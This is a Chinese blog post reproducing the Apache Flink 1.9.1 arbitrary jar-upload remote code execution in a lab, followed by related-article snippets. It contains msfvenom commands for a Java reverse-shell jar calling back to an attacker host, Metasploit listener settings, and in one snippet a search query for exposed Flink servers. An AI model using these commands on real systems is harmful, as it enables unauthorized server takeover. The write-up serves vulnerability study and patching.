【漏洞复现】Apache Flink RCE 漏洞复现

最新推荐文章于 2024-07-12 16:20:49 发布
最新推荐文章于 2024-07-12 16:20:49 发布
阅读量694 收藏 1
点赞数
分类专栏: 漏洞复现验证 文章标签: flink 命令执行 反弹shell
原文链接:https://blog.csdn.net/weixin_45492773/article/details/105975768
版权
本文详细介绍了Apache Flink的一个安全漏洞,该漏洞允许攻击者通过上传恶意jar包在Flink Dashboard上实现远程代码执行。影响范围包括Apache Flink 1.9.1及以下版本。复现步骤包括生成Java后门jar包,上传到Flink的SubmitNewJob模块,通过监听器捕获反弹的shell。修复建议是尽快升级到最新版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

参考:https://blog.csdn.net/weixin_45492773/article/details/105975768

0x00 简介

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本

Apache Flink <=1.9.1

0x03 环境搭建

目标机:192.168.72.128(centos7)+Flink 1.9.1+jdk8
攻击机:192.168.72.138(kali)

(1)自行百度安装jdk8,下载Apache Flink 1.9.1安装包并解压,解压后进入目录下bin文件夹,运行./start-cluster.sh

root@root:~# wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
root@root:~# tar  –zxvf  flink-1.9.1-bin-scala_2.11.tgz
root@root:~# cd /flink-1.9.1
root@root:~# ./start-cluster.sh

(3)Flink启动之后,默认web 端口8081,访问http://IP:8081/
在这里插入图片描述

0x04 复现

(1)kali生成jar后门包

root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.72.138 LPORT=4444 -f jar > rce.jar

(2)点击Submit New Job模块+ Add New上传
在这里插入图片描述(3)设置监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload java/shell/reverse_tcp 
msf5 exploit(multi/handler) > set LHOST 192.168.72.138
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run

(4)展开jar包,点击Submit,反弹成功
在这里插入图片描述在这里插入图片描述

0x05 修复建议

升级至最新版本!!

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
战神/calmness的博客
10-14 2176
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 漏洞概述: 攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 漏洞版本: 至目前最新版本Apache Flink 1.9.1 漏洞复现: 1.测试环境:Flink 1.9.1 java8+ 2. 生成...
Apache Flink任意JAR包上传漏洞分析与修复指南
weixin_43822401的博客
07-08 933
漏洞允许未经授权的用户上传JAR文件,这些JAR文件可以在Flink集群上执行,可能导致远程代码执行(RCE)。Apache Flink的任意JAR包上传漏洞是一个严重的安全问题,需要立即采取措施进行修复。通过本文提供的分析和修复指南,可以帮助管理员和开发人员保护他们的Flink集群不受此漏洞的影响。
Apache Flink RCE 漏洞复现
weixin_44508748的博客
11-24 805
介绍 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
Apache Flink RCE漏洞复现(任意 Jar 包上传)
Li-D的博客
08-31 4586
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
【学习笔记】Apache Flink任意Jar包上传导致RCE
lx_lyt的博客
11-19 719
Apache Flink任意Jar包上传导致RCE 一、简介 Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache flink允许上传任意的jar包从而导致远程代码执行。 二、影响范围 ...
漏洞复现-Apache-FLink
小刚的博客
01-08 1562
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Apache-FLinkApache-FLink介绍两个漏洞远程代码命令执行利用过程批量测试本地文件读取利用过程 Apache-FLink 介绍 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 两个漏洞 未授权.
漏洞复现Apache Flink任意Jar包上传导致远程代码执行
Summer's blog
05-13 1万+
记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 致力于小白都能看懂的漏洞复现过程!
漏洞修复修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞
RobinWang的博客
01-15 8664
漏洞修复修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
Apache Flink漏洞复现(未授权访问&上传jar包getshell)
qq_43244584的博客
01-26 6088
Apache Flink漏洞复现(未授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过未授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
Apache-Flink未授权访问高危漏洞修复
最新发布
weixin_38255219的博客
07-12 2955
由于flink没有鉴权的设置,使用使用 htpasswd 工具+服务器系统防火墙设置,才能禁用默认对外访问的8081端口,使用用户名+密码实现安全验证登录flink web ui。
Flink高危漏洞 (CVE-2020-17518/17519) 修复指南
u013289115的博客
01-19 4806
一、背景二、修复方法三、详细步骤1.准备flink源码2.找到修复的commit3.编译打包4.替换jar包四、总结 一、背景 ​ 国家信息安全漏洞库(CNNVD)收到关于Apache Flink安全漏洞(CNNVD-202101-271、CVE-2020-17519)(CNNVD-202101-273、CVE-2020-17518)情况的报送。成功利用漏洞的攻击者,可在未授权的情况下,构造恶意数据执行任意文件读取或文件写入攻击,最终获取服务器敏感性信息或权限。Apache Flink 1.5.1 - .
Apache Flink CVE-2020-17519/17518 漏洞复现
蚁景网安学院
01-18 897
喜欢就关注我吧,订阅更多最新消息文章字数1507 预计阅读时长7分钟 涉及知识点实操练习-网络安全事件https://www.hetianlab.com/cour.do?w=1&am...
Apache Flink 未授权访问+远程代码执行
Birdman-one的博客
12-11 2418
Apache Flink 未授权访问+远程代码执行 作者:Birdman-one 前言 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 此次复现就是通过版本Version: 1.10.1进行复现利用。 FOFA FOFA 语句 app="Apache-Flink" && country="CN" app="Apache-Flink" && country="CN" &&am
Apache Flink 未授权远程代码执行提权(实战)
失心少年
12-04 1398
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天
11-09 3960
文章目录一、Apache Flink简介二、漏洞简介三、漏洞复现四、上传jar包getshell 一、Apache Flink简介 Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但
精通Apache Flink读书笔记--1、2
热门推荐
lmalds的专栏
03-06 1万+
Flink Master Apache Flink
Apache Flink 1.9.1服务漏洞分析与解决方案
资源摘要信息:"Apache Flink是一个开源的流处理框架,用于在高吞吐量和低延迟的情况下进行有状态的计算。其核心是一个分布式的、基于任务的、事件驱动的系统,能够处理大量数据并支持各种复杂的数据处理任务。Flink...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值